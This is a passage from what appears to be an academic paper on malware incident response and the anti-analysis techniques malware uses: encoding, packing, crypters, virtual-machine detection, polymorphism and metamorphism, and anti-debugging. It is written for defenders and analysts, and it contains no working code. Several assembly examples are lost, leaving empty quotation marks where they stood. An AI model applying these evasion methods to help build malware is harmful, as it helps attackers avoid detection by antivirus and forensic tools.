interruption until the next breakpoint is reached. The analyst will be required to step though the entire
executable, using breakpoints as appropriate, disabling all of the armoring and anti-forensic routines
encountered in the executable. Once the analyst has bypassed all the protections within the binary, the
in- memory process can be dumped to disk. Tools exist to rebuild the Import table and other required
sections of the Portable Executable (PE) file format (see Section 4.2.3 for explanation of Portable
Executable File Format). Once the file has been recreated in an unpacked or decrypted format, the
analysis can continue as before.
There are armoring techniques that are designed to resist these efforts in reverse engineering by using a
debugger that will inhibit the recreation of the executable in an unpacked/decrypted fashion. In these
cases, the final option is to extract all required data about the executable directly from the memory
used by the running process. Tools like Volatility or Nigilant32 can be used to extract images from
memory dumps, but the technology for doing these extractions is still in its infancy and useable results
aren’t always achieved.
The challenge inherent in every phase of the malicious binary analysis process is that decisions made
based on the outcomes of the analysis could be incorrect or ineffective due to erroneous conclusions
27
drawn as a result of incorrect analysis.
Without some degree of specialist
knowledge, advanced analysis
techniques like those described in the
“binary and code analysis” or “memory
analysis” phase could result in
continued infection by the malware,
flawed monitoring and/or detection
routines, and ineffective system
cleaning routines.
As mitigation to the potential damage
done by faulty in-house analysis, it is
often considered good practice to have
the organization’s A/V partner receive
a copy of the suspect binary for
purposes of developing detection and
cleaning routines that are compatible
with the existing A/V infrastructure. In
this way, containment is split between
internal resources working towards
identifying the impact of the infection
and the external A/V partner working
on the development of material
required to rid the organization of the
malware.
Figure 8 - Memory Analysis (Aquilina, Casey, & Malin, 2008)
28
3.5. Eradication
The goal of the eradication phase is to get rid of the attacker’s artifacts on the machine, including
accounts, malicious code, pirated software, pornographic material, or anything else the malicious actor
has left on the machine (SANS, 2006). Once the malware has been identified and analyzed,
compensating controls can be applied to remove the threat of re-infection and/or spread of the
infection. These compensating controls can involve (but are not limited to):
1) Applying updated virus signature (includes both detection and cleaning)
2) Patching vulnerable systems
3) Strengthening existing security controls (i.e. change passwords, modify system configurations,
implement network access controls)
4) Implementing threat specific monitoring routines
Creating Anti-Virus (A/V) identification and cleaning signatures is typically done under support contract
by the A/V vendor. A sample of the malware specimen is submitted to the AV vendor for analysis, with
a custom signature returned to the enterprise once it has been created and tested. Since this signature
creation can take some amount of time, the process of submission should be started as quickly as
possible. Upon receipt of the new signature, distribution should take place as quickly and broadly as
possible. Most modern threats have the ability to spread in an automated fashion using several
different vectors, so broad distribution is required.
The spread of these malware threats is largely due to vulnerabilities in the platforms and applications in
use by the organization. For this reason, patching against these identified vulnerabilities is an important
step in the eradication phase. When all systems are patched against the exploits coded into the
malware, automated spread via infection is severely curtailed.
In addition to platform and application vulnerabilities, malware can exploit weak or common passwords
and insecure default configurations. Malware often includes routines for brute forcing and dictionary
lookup attacks. By strengthening these weaker instances of a control, the threat of spread is reduced.
In order to ensure that the spread of the malware is contained, and that eradication efforts are
effective, threat specific monitoring routines should be implemented in the environment. These specific
monitoring routines may be in the form of N-IDS signatures designed to alert on matching network
29
strings, network perimeter alarms that alert when a specific Internet destination is attempted, or may
be in the form of file signatures calculated as part of a file system integrity solution.
3.6. Recovery
The goal of the Recovery phase is to put the impacted systems back into production in a safe manner
(SANS, 2006). Once the threat has been removed from the environment, the task of recovering work
product interrupted by the infection can commence. Since the typical response to a malware infection
is to remove the infected machine from the network, effort must be made to ensure that any data
migrated back to the network is free of the threat that started the incident. Using the same cleaning
and monitoring tools outlined above the organization can systematically recover data from backups (or
the infected systems itself) and return it to the production environment. The advances in identification
capability, containment, and eradication should immediately alert the organization of any remaining
infection in the recovered data.
In addition to moving the data back into production, the recovery stage is also the stage where other
groups within the organization can be apprised of the incident so as to deal with the impact of the
incident. In some cases there may be some Legal repercussion of the incident (e.g.: control of licensed
content lost) that will require intervention by the Legal staff. There may also be a requirement to adjust
a marketing plan or some other product related strategy as a result of industrial secrets that have been
compromised in a malware-based breach.
These two areas, and potentially others, are all dealt with in the recovery stage and are designed to
return the organization to a healthy, competitive stance.
3.7. Lessons Learned
The goal of the Lessons Learned phase is to document what happened and improve the organizations
capabilities (SANS, 2006). By assessing the incident, from infection to identified impact, an organization
can evaluate the controls for their effectiveness in stopping identified threats. This evaluation should
provide a list of areas that can be given priority from the perspective of compensating control
implementation. The controls identified in the lessons learned phase might not all be technical
(computer system based) controls. Often these controls will be softer controls like employee training
and awareness activities; as computer systems become better secured, vulnerabilities like social
engineering become even more prevalent.
30
3.8. Conclusions
Incident Response is all about effective, timely, and consistent response to some negative event. The
response must be effective and must be able to immediately show some reduction in the negative
impact of the event. If the current response is not showing some reduction in impact, the response
must be changed. Changing a response plan midway through an incident can be costly from a loss
perspective, which is why a consistent and planned response is so important. Planning and testing a
response prior to the incident occurring can effectively eliminate any wasted time or resources spent in
the misguided response to the incident. The planned response must take into account the key assets
and critical business factors important to the organization. These assets and business factors should be
identified and defined in the Security Policy. In this way, the response will be measured according to the
impact of the event and according to the importance of the attacked assets within the organization.
4. Armoring Techniques
4.1. Introduction
The goal of all armoring techniques is to delay or stop the analysis of an executable by either
behavioural observation and/or reverse engineering. By delaying or stopping the analysis of the
executable, the author ensures both a maximized effective lifespan in the network (Intranet or Internet)
and the anonymity of both the attackers and their controlling servers. Effective lifespan is described as
the amount of time that the malware can exist within a system or network without being detected by
mainstream detection mechanisms like those defined in Section 3.3. The effective lifespan is maximized
due to the following capabilities:
1) Hidden methods of spread and infection, and
2) Unknown capabilities of the malware, and
3) Resistance to identification and classification.
Before the malware specimen has been identified as malware, there is an opportunity to have the
malware spread across a multitude of networked computer systems. Since no monitoring signature has
been defined to alert on the malware, the malware can continue to spread unhindered via methods that
have not been documented. Further, A/V solutions will not have an understanding of the various
capabilities within the malware, which may reduce the effectiveness of the early versions of the
detection and eradication signatures.
31
As new malware versions are developed, capabilities are added to the malware that resist efforts made
by the infected organization to remove the malware. Organizations will have limited success in cleaning
a system if they are not able to identify all of the locations in which the malware has embedded itself.
Lastly, some of these newly added capabilities actively defend the presence of the malware on the
infected machine. Capabilities like poly- or meta-morphism, multi-partite malware or even malware
that hides itself in the boot sector of an infected computer are often not properly identified and thus
not properly eradicated.
In a similar (but opposing) fashion, for those doing the analysis, their motivation to break the armoring
will be one (or more) of
1) Development of a compensating control against the malware threat,
2) Quantification of incident impact,
3) Technical curiosity or research (includes “borrowing” of another malware writers
techniques)
For analysts tasked with developing/maintaining compensating controls, including network IDS/IPS, Host
IDS/IPS, anti-virus signatures, and the others described in the Incident Identification section (Section
3.3), malware analysis is undertaken to assist in the development of re-usable and reliable signatures for
detecting the malware.
For many commercial organizations, the most important reason to perform an analysis of a malware
specimen is to try to quantify the damage done, or the intellectual property lost, from a malware
incident.
Researchers, hobbyists, and other malware authors will also undertake binary analysis of malware to try
to keep abreast of, or move beyond, current technical capabilities found in malware. The malware/Anti-
Virus conflict can be compared to a “cold war like” escalation of ever increasing capabilities and
defenses.
All of the following techniques can be used, often additively, to add protection to the malware in order
to cause delays or abandonment of the analysis. Some of these techniques may also assist in keeping
the malware hidden, thus evading detection by the very tools designed to identify these threats.
32
Each of the techniques described below will be examined using the same basic format in an effort to
answer the following questions:
1) What is the armoring technique, and how does it work?
2) Why are hackers utilizing this armoring technique?
3) How does this armoring technique defeat the traditional analysis cycle?
4) What can defenders and investigators do to defeat this armoring technique.
These four questions will organize the important facts about each of the armoring techniques. A
discussion on what the armoring technique is and a section will follow how it works on the benefits that
the armoring technique offers to the malware author. Lastly, an examination of how this armoring
technique impacts the binary analysis process from the perspective of the forensic investigator will be
provided. Where possible, either an overview of current research or suggested alternative procedures
will be outlined that may hold promise over the specific armoring technique.
4.2. Encoding
There is a family of armoring techniques that all revolve around obfuscating the display of the inner
workings of the malware from the analyst. These encoding techniques do not alter the malware’s
execution flow; rather they simply mask the user input/output routines under a vale of obfuscation.
4.2.1. String Encoding
String encoding is a function that replaces every ASCII character based, english readable, string with an
encoded equivalent. The basic function works as shown in Figure 9. Every standard string is known and
defined at compile time and is built into the malware. By using a simple substitution routine the
encoded character string can be returned to its original state just before being sent to the console or
C&C server.
33
Figure 9 - String encoding/replacement
The goal of armoring a piece of malware is to enable it to remain hidden for as long as possible and to
hide its inner workings. Strings like destination IP addresses, C&C commands, even error strings, can
reveal information about the threat that can be used in the implementation of compensating controls.
By replacing every string inside the malware with an encoded equivalent, it becomes more difficult to
ascertain the true capabilities of the executable, the actual C&C commands and their networked
destinations, or the mission of the executable.
Universally, a leading step in the analysis process is to complete a simple dump of the binary, looking for
strings. Strings are defined as a sequence of UNICODE (or ASCII) [characters] of a default length of 3 or
more UNICODE (or ASCII) characters (Russinovich, Strings v2.41, 2009). The strings found in a binary will
include the command/control messages, the error messages, and network settings, including URIs,
commands, usernames, and passwords. Armed with this knowledge, the analyst may have sufficient
information to identify files related to the function of the malware in order to ascertain network
addresses that can be blocked at the perimeter, etc.
Typically, this first step of dumping the ASCII strings from within a piece of malware is made ineffective
by malware authors using string encoding. However, as an alternative to simply dumping the strings
within the malware, the malware could be opened in a debugger or disassembler and analyzed to
identify the encoding function. Once the encoding function is identified, each of the encoded strings,
also identified in the disassembly process, can be manually decoded to identify its actual message.
These extra steps required to de-obfuscate the ASCII strings will add a significant amount of time and
effort to the manual analysis process. If the obfuscation or encoding sequence is complex enough,
employing this armoring technique alone may lead to the abandonment of the analysis by the
investigator.
4.2.2. Payload Encoding (Encryption)
Payload encoding works much like string encoding discussed above, but is applied to the communication
between victim and controller over the network. Prior to sending any communication over the network,
the data is put through an encoding or encryption algorithm. In this case, the difference between
34
encoding and encryption is the complexity and resistance to cryptanalysis of the encoding algorithm.
The function works like shown in Figure 10:
Figure 10 - Payload Encoding
Payload encoding can also be applied to payloads stored on the local storage medium of the infected
computer. Many instances of malware include the ability to copy every keystroke into a file, and at
regular intervals this content is uploaded to the C&C server. Between these intervals, the key logs are
stored in local files on the infected computer. These key log files will also be encoded or encrypted in
the same fashion as the network traffic.
Similarly, hackers use this technique to evade network detection and to evade analysis of the captured
material. Network Intrusion Detection Systems (N-IDS) are programmed to alarm when a matching
sequence of characters is observed over the network connection. Many frequently used command and
control strings are programmed into N-IDSes in an effort to identify infected systems. Infected systems
employing a method of encoding or encryption on their network communications will be hidden from
view by these N-IDS systems.
One of the steps in the assessment of an infected computer is to perform a media analysis of the hard
drives within the system. It is during this analysis that a key log file will be discovered. If the key log file
is encoded or encrypted, the file’s discovery will be the first and last step of the analysis. The attacker
will have safely hidden the extent (or impact) of the data captured and [possibly] exfiltrated out of the
company.
Malware is often analyzed in part by the network traffic it transacts. By collecting the network traffic
being sent to and from the infected computer, the analyst can gather a great deal of information about
what is being sent between to the infected computer and the C&C server. If the analyst encodes this
35
traffic in a way that eludes simple decoding, the analyst will have no network detail to contribute to the
assessment of the impact or threat posed by the malware. This also applies to any files saved local to
the infected system – the analyst will discover the files, but no additional insight into the mission or
impact of the malware will be known.
In much the same way as described for string encoding, unless the decoding/decryption algorithm is
known to the analyst, the insight offered by network traffic analysis and local file analysis will be
minimal. An analyst may be able to open the malware in a debugger or disassemble and identify the
routine responsible for the encoding of the data, but the task will be quiet laborious and may even lead
to the abandonment of the analysis of the malware.
4.2.3. Executable packing
A packer is a tool that is used to compress an executable (or DLL). In the process of compressing the file,
a decompressor stub is added to the original executable. Much like the .zip or .rar style compressors,
these programs look for runs or repeating sets of characters in the various sections of an executable and
replace those sets of characters with a shorter symbol. In the windows environment, standard
executables are in the form of the Portable Executable or PE file format.
The standard PE file format is shown in Figure
11. The PE file on disk is laid out similar to
how the process will be laid out in memory.
PE files consist of a number of headers and
sections that tell the Windows loader how to
map the file into memory. Every section in a
PE file is mapped into a different region of
memory (and therefore must be page-aligned;
this is the Section Alignment in the PE header)
with different permissions (Websense). Thus
the effort required for the loader to take an
image from disk and create a process is
minimal. The loader uses the memory-
mapped file mechanism to map the appropriate pieces of the file into the virtual address space. Once
the module has been loaded, Windows can effectively treat it like any other memory-mapped file
Figure 11 - PE File Layout (Pietrek, 1994)
36
(Pietrek, 1994). For the Windows 32-bit environment, or “Win32”, all of the memory used by the
module for code, data, resources, import tables, export tables, and other required data structures is in
one contiguous block of memory. All of the pieces of the module can be found by following the pointers
that are stored in the PE file header contained within the image (Pietrek, 1994). The main PE header is a
structure of type IMAGE_NT_HEADERS, which contains two substructures named IMAGE_FILE_HEADER
and IMAGE_OPTIONAL_HEADER. The IMAGE_FILE_HEADER contains information regarding the
supported CPU, the number of sections, the date-stamp from the linking process, and a few pieces of
data that support the number and loading of Symbols.
The IMAGE_OPTIONAL_HEADER is the
structure that contains the information that
will be used when the file is packed, such as
SizeOfImage, SizeOfHeaders, and SubSystem.
The IMAGE_OPTIONAL_HEADER structure is
laid out in Figure 12.
After the PE header, there are a number of
IMAGE_SECTION_HEADER (Figure 13)
structures. The number of structures
following the PE header is defined within the
IMAGE_FILE_HEADER structure. These
IMAGE_SECTION_HEADERs contain
information about each of the sections,
including the size (in memory), the relative
address (to the start of the ImageBase;
defined in IMAGE_OPTIONAL_HEADER), a
pointer to the start of the data within the section, and the characteristics of the section (Websense)
(Pietrek, 1994).
In addition to protecting a Windows executable, packers perform various modifications on PE files, such
as adding a new IMAGE_SECTION_HEADER in the SECTION_HEADER_TABLE (in other words, adding a
new section to the file with the appropriate characteristics), updating the Entry Point relative virtual
Figure 12 - IMAGE_OPTIONAL_HEADER (Websense)
37
address (RVA), and updating the SizeOfImage (Websense). These additions to the executable contain
the code required for the loader of the packer (the component that will decompress and re-construct
the packed file). The number of sections will
also be increased by one due to the added
loader section; as well, all of the documented
size fields are updated. Finally, the packer
updates the EntryPoint field, which holds the
location of the first executable instruction,
now the first instruction of the packer’s
loader.
The loader within a packer is responsible for the following tasks:
1) Self decryption of the loader
2) Decompression and decryption of the remaining sections into memory
3) Relocation handling for DLLs
4) Import table handling (the part of the loader that mimics the Windows PE Loader and fills
the Import Address Table)
5) Jump to the original entry point (saved at packing time) (Websense)
From an examiners perspective, all of the armoring is done within the loader portion of the packer, so it
is important for the author of the packer to implement some level of encryption and/or debugger
detection into the loader. The loader also decompresses all of the sections of the executable and places
them back into the proper address space (in accordance with RVA and ImageBase). The loader also
reconstructs the location of handlers for DLLs and the Import Table entries. Finally, the loader jumps to
the original entry point (OEP) of the executable. By this time, the process has been reconstructed in
memory and the first original instruction has begun. Notice that at no time was the unpacked
executable placed on any persistent storage media, like the disk drive.
As is clear from the preceding discussion, packing an executable offers many advantages to the malware
author. The primary advantages are:
1) Gains in protecting the executable from reverse engineering or analysis.
Figure 13 - IMAGE_SECTION_HEADER (Websense)
38
2) Unpacked image is never written to disk, bypassing many host based protections
3) Packing can be considered an IDS evasion tactic, as known file signatures are obfuscated
4) Packers reduce the size of executables – useful for covert transmission of payloads.
Not only does this armoring technique make the malware difficult to reverse engineer by the
investigating analyst, but the packer can also protect the intellectual property of the malware author –
from the authorities, analysts and other malware authors. Given the modular design of a packer, it is
also possible to implement an inline function that adds an element of encoding (or encryption) [see
Section 4.4] to the packed file (Websense).
The most powerful part of using a packer is that the malware never is stored on the local hard disk.
Everything is run as in-process memory, which can generally bypass most antivirus and host-based
security tools. Only if the packer is known, an antivirus engine can identify the threat as it unpacks the
malware. (Davis, Bodmer, & LeMasters, 2010)
In addition to bypassing most host-based protections, packed executables can more easily evade N-IDS
monitoring because ASCII strings and sequences of instructions are compressed and/or encrypted, the
transmission of such content often does not alert the listening N-IDS. When the N-IDSes are blind, so
will the Security Operations and Forensic Examination staff.
Lastly, packers serve another useful feature for evading detection: bandwidth reduction. Large,
bandwidth-consuming transfers of information are easily identified when other production services are
delayed due to contention on the transmission line.
Packed malware can defeat the traditional analysis cycle in a few key ways. The first is that it is difficult,
sometimes impossible, to unpack an executable into a format that is conducive to analysis. In these
difficult cases, the executable may have to be reconstructed using a memory dump, with an external
tool used for the Import Table reconstruction. The second is that packers are often implemented with a
multitude of armoring techniques that confound analysis. Each of the armoring tactics discussed in this
paper can also be applied to the single purpose loader.
Since the detection of executables is often done by comparing the sample against known signatures
made up from typical PE file structures and organization, detection will be less reliable and accurate due
to packing. The traditional approach to detect malware, as implemented in anti-virus scanners, is based
on (string) signatures that match specific malware binaries (Szor, 2005). Since code obfuscation and
39
runtime packing can be used to easily evade this type of detection, researchers have proposed more
sophisticated techniques, for example, detection based on model checking (Christodorescu & Jha, Static
Analysis of Executables to Detect Malicious Patterns, 2003), recognition of structural similarities
between malware samples (Kruegel, Kirda, Mutz, Robertson, & Vigna, 2005), and semantics-aware
analysis of code templates that implement specific functionality (Christodorescu, Jha, Seshia, Song, &
Bryant, 2005).
In addition to these areas of research of identifying malware, there are also research projects centered
on memory forensics and executable extraction from memory. Tools like Volatility, Nigilent32, and
others plan to improve the accessibility of process and executable information from the memory of
running systems.
4.3. Virtual Machine Environment (VME) Detection
It has been shown in the last number of years that certain CPU instructions, executed in the correct
order, will identify whether an executable is running inside of a virtualized environment. (Rutkowska,
2004). Further research has shown that CPU semantics attacks (Dinaburg, Royal, & Lee, 2009), (Ferrie,
2007), (Kang, Yin, Hanna, McCamant, & Song, 2009) based on differences between emulated and real
CPUs are also used actively by malware in the wild. The checks used by these attacks exploit
undocumented side-effects of x86 instructions or look for the presence of CPU specific mode registers
that are typically not present on the emulated processor (Balzarotti, Cova, Karlberger, Kruegel, Kirda, &
Vigna, 2010).
There are 3 primary checks that are done to identify if the environment is virtualized:
1) Observation of the Interrupt Descriptor Table Register (ITDR)
2) Observation of the Global Descriptor Table (GDT)
3) Observation of the Local Descriptor Table (LDT)
In 2004, a security researcher named Joanna Rutkowska (Rutkowska, 2004) observed that the ITDR can
be analyzed after an SIDT call to indirectly identify whether the machine executing the SIDT call was
within a virtualized machine. She observed that in both VMware and Microsoft VirtualPC, the Interrupt
Descriptor Table (IDT) is higher in memory than when the machine was not virtualized.
40
Figure 14 - Redpill VME detection routine (Rutkowska, 2004)
She then wrote a single line program, show as Figure 14 that reported back whether the IDT was located
below address 0xd0000000. If the returned address was above memory address 0xd0000000, the
machine was concluded to be running within a virtual environment. With the advances of security
monitors like grsecurity (Spengler,
2011) and PAX (the PaX team),
the SIDT call is not permitted
unless specifically allowed, which
causes this particular VME check
to fail.
Beyond the IDT, there are other
critical operating system
structures an attacker can look to
for detecting VMEs, notably the
Global Descriptor Table (GDT) and
the Local Descriptor Table (LDT).
The GDT is a data structure used
by Intel x86-family processors in
order to define the characteristics
of the various memory areas used
during program execution, for
example the base address, the
size and access privileges like
executability and writability (Intel,
1999). The LDT is much like the
GDT, except that the GDT is a system wide table that does not get swapped or context switched. The
Figure 15 - LDTR, GDT based VME detection (Klein, 2010)
41
LDT will be switched when execution context goes from one process to another. Additionally, there will
be generally one LDT per user process, describing privately held memory, while shared memory and
kernel memory will be described by the GDT (Intel, 1999). Due to the implementation of the VME,
these two tables can provide clues about whether the running system is virtualized or not. Tobias Klein
wrote routines shown as in Figure 15 that can be used to return the locations in memory of these tables,
and based on the location of these tables, the routine can determine if the machine is virtualized (Klein,
2010).
In addition to kernel structure differences, most VMEs have device drivers that optimize the use of
shared and/or virtualized hardware. Often, these device drivers can be enumerated and then queries
can be made looking for strings that identify the environment as virtual.
Finally, the most popular VME detection mechanism of all, and the most widely used in malicious code
today involves detecting the presence of the VMware by detecting the communications channel
VMware uses to send data between guest and host. This channel, implemented by adding some
functionality to the “ machine language instruction on VMware guests, is used for shared
clipboards, file sharing, and drag and drop features between guests and host systems in VMware (Liston
& Skoudis, 2006).
If a piece of malware is able to detect whether the environment is virtual, it can execute differently
than if the malware is executing on “bare metal” hardware. Thus, hackers use VME detection to hinder
analysis by returning fake or manufactured results in an effort to divert attention away from the actual
goals of the malware. Most, if not all, modern malware analysis systems use some form of virtual
machine technology. The following features of VME allow both the automated analysis and manual
analysis to be done much more efficiently:
1) Multiple, simultaneous operating systems,
2) Ability to reset to a previous “snapshot” (undoing any changes made by the malware),
3) Easily monitored, and
4) System and network isolation (Liston & Skoudis, 2006).
If the malware behaves differently when executed in a VME environment, the malware will stay
invisible to automated analysis systems, and in so doing, the malware programs can operate (and
generate revenue) for a longer period of time. (Balzarotti, Cova, Karlberger, Kruegel, Kirda, & Vigna,
42
2010). Because so many security researchers rely on VMEs to analyze malicious code, malware
developers are actively trying to foil such analysis by detecting VMEs. If malicious code detects a VME, it
can shut off some of its more powerful malicious functionality so that researchers cannot observe it and
devise defenses. Given the malicious code’s altered functionality in light of a VME, some researchers
may not notice its deeper and more insidious functionality. (Liston & Skoudis, 2006)
This armoring technique is used to evade the analysis required to identify the impact and capabilities of
the malware. If a malicious executable behaves uniquely when run in a virtualized environment than
when run in a bare metal environment, the response plan devised by the analysts and examiners may
not prove effective in the real world landscape of the commercial network. This poor response will lead
to additional data loss, additional infections, and possibly the failure of complete eradication of the
threat from the network.
It has been shown that there are 2 classes of response to the problem of VME aware malware. It is clear
that the analysis of malware must be automated (in some fashion) in order to keep up with the number
of unique instances of malware that are presented “in the wild”. One class of approaches focuses on
the development of analysis platforms that are more difficult to detect by malicious code. A second
class of approaches to address the problem of analysis-aware malware is to detect the fact that a
malware sample behaves differently in different environments (Balzarotti, Cova, Karlberger, Kruegel,
Kirda, & Vigna, 2010). This is consistent with the findings from a related study (Chen, Andersen, Mao,
Bailey, & Nazario, 2008), in which the authors show that about 4% of malware samples behave
differently when run in- side a virtual machine.
4.4. Run-time decryption
Run-time decryption is similar in most ways to a packer, with the exceptio that instead of singularly
using a compression algorithm to reduce the size of an executable, the executable is compressed,
encrypted, and then written to disk. This section will highlight only the differences in packers and
“crypters”; and as shown in Figure 16, nearly the whole process of transforming an executable into an
encrypted executable is the same as packing a file using packing technologies discussed in Section 4.2.3.
43
Figure 16 - Packer and Cypter Comparison (Aquilina, Casey, & Malin, 2008)
Like a packer, in that the un-packing routine is distributed with the executable, the decryption routine in
a crypted executable is stored inside the executable and is distributed with each copy of the executable.
As shown pictorially in Figure 17, the crypter function is attached to the end of the executable file as an
additional section (see Section 4.2.3 for PE file description).
Figure 17 - Runtime Decryption - Executable View (Oreans Technologies, 2008)
Malware authors will use these crypting tools for all of the same reasons as one would use a packer:
1) Gains in protecting the executable from reverse engineering or analysis,
2) Decrypted image is never written to disk, bypassing many host based protections
3) crypting can be considered an IDS evasion tactic, as known file signatures are obfuscated
Absent from the list is the file compression benefit, as some encryption algorithms will add content due
to content padding, field or block alignments and other additional data storage requirements unique to
the crypter. However, most crypters have added the features required for the malware author to add
other armoring techniques to the crypted file (Figure 18).
44
In much the same way as packed malware or
crypted malware can defeat the traditional
analysis cycle by confounding the binary
analysis efforts, crypted executables are
difficult, sometimes impossible, to decrypt into
an executable format that can be analyzed
using standard processes. In these difficult
cases, the executable may have to be
reconstructed using a memory dump, with an
external tool used for the Import Table
reconstruction. If the crypted malware has
other armoring techniques applied to it,
reconstructing the executable from the
contents of memory may also fail due to those
armoring techniques.
In much the same way as a packer can be
defeated by manually unpacking the executable, a crypted executable can be manually decrypted and
returned to its native machine ready state. Since the decryption routine is attached to the executable,
the analyst has all the required data to defeat the armoring technique. However, since this decrypting
must be done within some type of debugger, it can be a long, tedious, and error-prone activity. Similar
to other armoring techniques, crypting an executable may lead to abandonment of the analysis.
Since the detection of executables by both network and host based systems is often done by comparing
the sample against known signatures made up from typical PE file structures and organization, detection
can be less reliable and accurate due to crypting.
Once a crypter has become publicly known, for instance, when used in a mainstream threat, information
security professionals will develop an automated routine to properly decrypt the file. This file then is
added to the “tool kit” of many malware response and forensic examiners for use if or when a similar
threat is found in their organization. Accordingly, the crypter and malware authors continue to develop
new versions of their crypters in an effort to stay ahead of the detection and remediation process.
Figure 18 - Crypter with armoring options (xinfiltrate)
45
4.5. Polymorphism and Metamorphism
One of the shortcomings of runtime-encrypted malware is that while the virus body looks different from
generation to generation, the decrypter that is embedded in the virus remains constant for all
generations. As a result, it is possible to detect the virus indirectly by recognizing the code pattern of the
decrypter (Lin, 2009). Polymorphism is a particularly robust form of runtime encryption. A polymorphic
virus generally makes several changes to the default encryption settings, as well as altering the
decryption code. In a polymorphic virus, the content of the underlying virus code body does not change;
encryption alters its appearance only. (National Institute of Standards and Technology (NIST), 2005)
In contrast to polymorphism, the idea behind metamorphism is to alter the content of the virus itself,
rather than hiding the content with encryption. (National Institute of Standards and Technology (NIST),
2005). Figure 19 shows the 5 typical execution phases of a metamorphic virus, starting with the
capability to locate its own code within the host program, then decode, analyze, transform itself to a
new entity, then finally reattach to a new host. Metamorphic malware is somewhat different from a
metamorphic virus in that the malware doesn’t attach itself to a host program, but it will still follow the
same inner steps of decode, analyze, and transform.
Figure 19 - Anatomy of Metamorphic Engine (Walenstein, Mathur, Chouchane, & Lakhoti, 2007)
The metamorphic transformation techniques include
1) Equivalent instruction substitution,
2) Register swapping
3) “Garbage” or “dead code” insertion, and
4) Rearrangement of instruction/subroutine order
5) Transposition (only if no ordering dependencies in code) (Lin, 2009)
Instruction substitution is the replacement of an instruction or a group of instructions with an equivalent
instruction or group. For example, “ ”‖ is equivalent to “ ” and “
” can be replaced by “ ” then “ ”.
46
Register swapping is a method whereby the malware mutates itself by swapping the operand registers
with different registers. For example, the program could swap all occurrences of “ ” with “ ” and
all occurrences of “ ” for “ ”. “ ” can be considered an extension of “ ”, and these two
registers are not typically used for any other function (Swanson, 2003), so this pair of registers is a good
candidate for this metamorphic technique.
Another effective metamorphic technique is the insertion of garbage instructions. Garbage instructions
are instructions that are either not executed (dead code) or have no effect on program outcomes (Al
Daoud, Jebril, & Zaqaibeh, 2008). As shown in Figure 20, by inserting garbage instructions between core
instructions randomly (separated by instructions), a program can potentially generate infinite
unique copies.
Figure 20 - Insertion of garbage instructions (Al Daoud, Jebril, & Zaqaibeh, 2008)
Garbage instructions are those dead code instructions that are usually inserted between a “ ”‖
instruction and the location being jumped to, which holds the next actual instruction. Any instructions
between the “ instructions and the next actual instructions should not affect the processor state
or be executed. A table of garbage instructions that have no effect on the processor state or execution
path of the malware is shown in Figure 21.
Figure 21 - Common Garbage (or junk) Instructions (Orr, 2006)
Subroutine permutation is a technique that changes the appearances of malware by reordering the
malware’s subroutines. If an example of malware has n different subroutines, then it can generate n!
47
different generations without repeating (Lin, 2009). Since the subroutines themselves are not changed,
only their order within the program, monitoring solutions may still identify malware armored with this
technique due to known strings being matched.
Transposition is the reordering of the instruction execution sequence. This can only be done if the
affected instructions have no dependency between them. For example, if the second instruction does
not depend on the result of the first instruction, then the execution order of these two instructions can
be swapped. Consider the following example from (Lin, 2009):
We can swap the above two instructions only if:
1) not equal to ; and
2) not equal to ; and
3) not equal to .
While the above techniques for creating metamorphic malware provide great benefit to the malware
author, metamorphism does not come without cost. As shown in Figure 22, as much as 80 percent of
the malware’s code base is devoted to the metamorphic routines. Addition of these metamorphic
techniques will also add significant complexity to the malware.
Figure 22 - Breakdown of Metamorphic Malware (Driller, 2002) (Hosmer, 2008)
A strategy recently devised to offer the benefits of polymorphism and metamorphism while not adding
considerable complexity to the malware itself is known as “server-side polymorphism” (Wismer, 2007).
Instead of having the malware carry the transformation routines within it; the malware is either
transformed upon distribution from the server, or the malware is updated to a transformed version of
80 %
Morphing Engine
Code
20 %
Malicious Code
Disassembler Random Inserter
Permutator Compressor Assembler
48
itself after initial infection. This methodology has proven to be quite effective and difficult to counteract
when it comes down to the traditional anti-malware model. Server-side polymorphism is so hard to
detect because the transformation functions (the routines used to change the signature of the code) are
not visible to the virus analyst. The actual algorithms or techniques cannot be studied to the degree
necessary to create an effective vaccination (Sherstobitoff, 2008).
As discussed, the primary use for polymorphism and metamorphism is to evade detection by signature-
based and heuristic- based tools. Since the executables are being changed [typically] every time the
program is transferred across a network, monitoring programs looking for specific signatures will fail to
identify the transfer as being part of a malicious infection or attack. Many early generation heuristic
based monitoring programs will look for sequences of operations in a row and determine that the series
has malicious intent. Any randomly inserted “junk” instructions will obstruct the heuristic identification
of malicious instruction sequences.
This armoring tactic removes the potential to extend any conclusions gathered from the analysis of a
single piece of malware. A typical response from the analysis of a piece of malware might be the
insertion of a compensating control, like an A/V signature designed to identify and delete a file based on
physical characteristics like cryptographic hash, file size and date, and/or series of matching instruction
codes in the executable. In the case of metamorphic malware, this A/V signature would only match on
that particular strain of malware, and it is likely that there will never be another instance of that
malware which would positively match the signature.
Presently, there are many areas of research focused on the effective identification and automated
counter measures against metamorphic (and, to a lesser extent, polymorphic) malware. It seems
though, that currently the most effective counter measure against widespread adoption of metamorphic
malware is the difficulty and complexity in developing robust metamorphic routines as described above.
4.6. Anti-Debugging
Anti-debugging techniques are ways for a program to detect if it is running under the control of a
debugger. Software developers in both criminal and commercial environments use anti-debugging
techniques to prevent or slow-down the process of reverse engineering (Falliere, 2007). When used in
commercial environments, the goal of the software developer is to confound the efforts of hackers who
are trying to bypass the licensing or activation scheme of the commercial software. Hackers must use
debuggers in order to successfully understand the design of the licensing or activation mechanism.
49
Therefore, if protection is added to prevent the code from being run from within a debugger, hackers
may abandon attempts to reverse engineer such software because they have just lost the use of their
most valuable tool (Zhang, 2010). On the other hand, hackers are using these same techniques to
prevent or slow-down the process of binary analysis, an important step in the traditional incident
response process.
Anti-Debugging techniques can be split into 6 classes. There can be multiple implementations in each of
the classes, but the classes themselves are non-overlapping. These classes will be described in detail,
but as all of the classes are designed to either prevent or slow-down the analysis of a binary, the
questions of “Why do hackers use this technique?” and “How does this armoring technique defeat the
traditional analysis cycle?” will not be repeated.
4.6.1. API Based Detection
There are functions available within the Windows API to identify whether a debugger is attached to a
process. A C-style function showing how the API could be used is shown in Figure 23. This function
could be called on a regular basis, resulting in the immediate termination of the running process.
Figure 23 - isDebuggerPresent API use (Veracode, 2008)
If used in a tight loop within the malware (like the unpacker, decrypter, or I/O decoding routines), this
API based detection could be very effective in delaying the unrolling of the loops required to properly
analyze the malware.
Since this function must be available outside of the packed or encrypted content, it is possible to directly
edit the malware and bypass this API routine entirely, thus removing the debugger restriction from the
malware.
